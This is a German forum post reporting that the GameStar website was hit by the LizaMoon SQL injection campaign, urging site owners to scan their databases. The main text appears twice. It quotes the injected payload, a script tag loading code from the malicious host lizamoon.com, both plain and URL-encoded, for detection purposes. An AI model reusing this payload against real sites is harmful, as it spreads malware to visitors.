Ob4ru|3r
PCGH-Community-Veteran(in)
Die Website des Computerspiel-Fachmagazins "GameStar" wurde am heutigen Abend scheinbar Opfer einer sogenannten "SQL Injection/Insertion Attack", sprich: Es wurde externer (Schad)Code in die SQL-Datenbank der Gamestar Website eingeschleusst.
Geäussert hatte sich dies am frühen Abend ab etwa 19 Uhr, wo der Link zur grade veröffentlichten Newsmeldung zum kommenden potentiellen Modern Warfare 3 in der News-Sektion der Gamestar.de-Seite zu Warnungen im Header des Browsers führten, welche vom Security-Filter der Gamestar-Website ausgegeben wurde ("999 Possible Attack Detected"), mit der verqueren URL:
http://www. gamestar.de/spiele/call-of-duty-8%3C/title%3E%3Cscript%20src=http://lizamoon.com/ur.php%3E%3C/script%3E%3C/title%3E%3 Cscript%20src=http://lizamoon.com/ur.php%3E%3C/script%3E/news/call_of_duty_modern_warfare_3,466 50,2321907.htm
(Lücken wurden eingebaut, damit niemand versehentlich draufklickt, ältere oder andere Browser als der FF4 könnten die URL ja evtl, auch nicht automatisch blocken), sofern man sich die Mühe gemacht hat sich den Quelltext der Gamestar-Website zu durchfosten stiess man urplötzlich auf dutzende Einträge der Internetseite "lizamoon.com/ur".
Eine kurze Webrecherche ergab, dass es in den letzten paar Tagen scheinbar zu einer Flut von derartigen Injection-Attacken auf SQL-basierte Internetseiten kam, alle mit dem selben Eintrag
</title><script src=http://lizamoon.com/ur.php></script>
IP-Tracking weisst dabei auf Server in Russland hin. Es empfiehlt sich daher - sofern man Besitzer einer auf SQL-Datenbank basierenden Website ist - diese einmal nach diesem Code-Schnipsel zu durchsuchen, zumal noch nicht bekannt ist wie genau der Code eingeschleusst wurde.
EDIT: Die IP von der das Script scheinbar stammt, bzw. von der wohl Code nachgeladen werden sollte gehört scheinbar zu einem ganzen Block von Malware-Adressen, deren primärer Zweck es zu sein scheint als Virenschleuder im Netz aktiv zu sein: http://blog.dynamoo.com/2011/02/evil-network-voejkova-nadezhda-voejna.html
Das Resultat des Ganzen war, dass die Website der GameStar zwischenzeitlich wegen "technischer Störungen" nicht mehr erreichbar war, inzwischen lädt die Internetseite aber wieder normal, und auch die erwähnten fremden Segmente scheinen entfernt.
Quelle: Diskutiert wird diese Attacke auf etliche Webseiten u.a. hier: http://forums.asp.net/t/1667041.aspx/1/10?Re+LizaMoon+actack+who+know+about+this+
Geäussert hatte sich dies am frühen Abend ab etwa 19 Uhr, wo der Link zur grade veröffentlichten Newsmeldung zum kommenden potentiellen Modern Warfare 3 in der News-Sektion der Gamestar.de-Seite zu Warnungen im Header des Browsers führten, welche vom Security-Filter der Gamestar-Website ausgegeben wurde ("999 Possible Attack Detected"), mit der verqueren URL:
http://www. gamestar.de/spiele/call-of-duty-8%3C/title%3E%3Cscript%20src=http://lizamoon.com/ur.php%3E%3C/script%3E%3C/title%3E%3 Cscript%20src=http://lizamoon.com/ur.php%3E%3C/script%3E/news/call_of_duty_modern_warfare_3,466 50,2321907.htm
(Lücken wurden eingebaut, damit niemand versehentlich draufklickt, ältere oder andere Browser als der FF4 könnten die URL ja evtl, auch nicht automatisch blocken), sofern man sich die Mühe gemacht hat sich den Quelltext der Gamestar-Website zu durchfosten stiess man urplötzlich auf dutzende Einträge der Internetseite "lizamoon.com/ur".
Eine kurze Webrecherche ergab, dass es in den letzten paar Tagen scheinbar zu einer Flut von derartigen Injection-Attacken auf SQL-basierte Internetseiten kam, alle mit dem selben Eintrag
</title><script src=http://lizamoon.com/ur.php></script>
IP-Tracking weisst dabei auf Server in Russland hin. Es empfiehlt sich daher - sofern man Besitzer einer auf SQL-Datenbank basierenden Website ist - diese einmal nach diesem Code-Schnipsel zu durchsuchen, zumal noch nicht bekannt ist wie genau der Code eingeschleusst wurde.
EDIT: Die IP von der das Script scheinbar stammt, bzw. von der wohl Code nachgeladen werden sollte gehört scheinbar zu einem ganzen Block von Malware-Adressen, deren primärer Zweck es zu sein scheint als Virenschleuder im Netz aktiv zu sein: http://blog.dynamoo.com/2011/02/evil-network-voejkova-nadezhda-voejna.html
Das Resultat des Ganzen war, dass die Website der GameStar zwischenzeitlich wegen "technischer Störungen" nicht mehr erreichbar war, inzwischen lädt die Internetseite aber wieder normal, und auch die erwähnten fremden Segmente scheinen entfernt.
Quelle: Diskutiert wird diese Attacke auf etliche Webseiten u.a. hier: http://forums.asp.net/t/1667041.aspx/1/10?Re+LizaMoon+actack+who+know+about+this+
Zuletzt bearbeitet:
)
) habe ich mir, nur so aus Spaß, auch die Seiten vom IDG-Verlag angesehen und dabei kam manchmal diese "999 Possible Attack Detected"-Meldung, allerdings nur zu meiner Belustigung, denn der Filter erkennt nicht alles... 
Und ja, ich habe meine Funde immer an IDG weitergeleitet, aber... Naja, das übliche halt.
